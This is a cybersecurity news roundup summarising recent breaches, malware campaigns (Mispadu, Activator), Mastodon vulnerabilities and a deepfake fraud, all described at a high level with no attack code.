Windows users in Mexico are on the radar of cybercriminals planting an advanced version of the Mispadu banking trojan on their devices. The malware, part of the LATAM banking malware family, is using malicious internet shortcut files within ZIP archives. A similar account takeover threat hovers over a popular decentralized social network owing to a flaw that is rated 9.4 on the CVSS severity scale. Full details, however, will be disclosed on February 15, allowing admins time to patch.

Meanwhile, security researchers warned of a large-scale macOS cyberattack campaign distributing the Activator backdoor through cracked copies of popular software. Its multistage infection chain enables backdooring even if the user removes the cracked software.

Top Breaches Reported in the Last 24 Hours

Children's hospital thrown offline

Lurie Children's Hospital in Chicago experienced a cyberattack, leading to the temporary shutdown of IT systems. The incident affected the internet, email, phone services, and access to the MyChat platform. Although the hospital remains open and focused on delivering patient care, the cyber incident has caused delays in scheduled procedures, unavailability of certain medical test results, and disruptions in prescription processes.

AnyDesk’s production systems compromised

German company AnyDesk Software GmbH confirmed a security breach involving the compromise of its production systems. The company plans to revoke the previous code signing certificate for its binaries. It has already revoked all security-related certificates and is recommending users change their passwords for the web portal. AnyDesk assured users that, despite the incident, there is no evidence of affected end-user devices.

Top Malware Reported in the Last 24 Hours

Banking trojan bypasses SmartScreen flaw

A new variant of the Mispadu banking trojan emerged to abuse an already-patched Windows SmartScreen security bypass flaw. The attacks involve phishing emails and the distribution of rogue internet shortcut files using a vulnerability (CVE-2023-36025) in Windows SmartScreen, which Microsoft addressed in November 2023. Mispadu is known for selectively targeting victims based on geographic locations and system configurations.

Large-scale campaign delivers macOS backdoor

Security researchers uncovered a campaign that utilizes cracked copies of popular macOS software products to distribute the Activator macOS backdoor. The campaign stands out due to its scale, multistage payload delivery technique, and the threat actor's use of cracked macOS apps with titles likely to interest business users. The threat actor behind the backdoor employed as many as 70 unique cracked macOS applications to distribute the malware.

Top Vulnerabilities Reported in the Last 24 Hours

Mastodon patches high-severity bug

The decentralized social media platform Mastodon addressed high-severity vulnerabilities discovered in a Mozilla-requested security audit conducted by German pentesting firm Cure53. The first flaw involved the abuse of Mastodon's media processing code. Attackers could exploit this flaw using specially crafted media files to create or overwrite any files, potentially leading to DoS condition or RCE. The second flaw allowed HTML sanitization bypass in Mastodon, enabling the inclusion of malicious code in preview cards and introducing a vector for XSS payloads.

Top Scams Reported in the Last 24 Hours

Firm lost $25.5 million to deepfake scam

Scammers successfully stole HK$200 million (approximately $25.5 million) from a multinational company in Hong Kong by employing a deepfake video call to deceive an employee into transferring the funds. The attackers used publicly available footage of the company’s employees and applied deepfake technology to create fake versions of the meeting participants. The employee transferred the funds during the video call, thinking he was interacting with the company's CFO and other colleagues.